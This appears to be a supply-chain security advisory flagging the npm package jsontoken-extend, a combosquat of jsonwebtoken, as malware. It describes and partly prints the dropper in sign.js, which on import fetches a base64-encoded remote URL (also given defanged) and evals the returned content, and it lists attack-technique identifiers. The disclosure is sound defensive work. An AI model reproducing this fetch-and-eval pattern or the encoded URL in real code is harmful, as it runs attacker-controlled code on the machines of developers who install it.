LWA-2026-3258 MAL-2026-4592 ↗ confirmed malware

jsontoken-extend@1.0.13

Malicious code in jsontoken-extend (npm)

T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1105 · Ingress Tool TransferT1071.001 · Web Protocols

Analysis

Combosquat of jsonwebtoken (name: jsontoken-extend). sign.js contains an IIFE that runs on require(): fetch(atob('aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9YQU1SSw==')) -> hxxps://www[.]jsonkeeper[.]com/b/XAMRK, parses JSON response and evals data.content — classic remote code execution dropper. A second commented-out block targets a different jsonkeeper[.]com URL. No token-theft markers, but the package is a supply-chain trojan: it impersonates the popular JWT library and executes attacker-controlled code from a remote paste service on import. Publisher uses free Outlook email; deps include deprecated request and execp.

analyzed by
Leitwacht
first seen
Jun 8, 2026, 06:34 PM
analyzed
Jun 8, 2026, 06:35 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.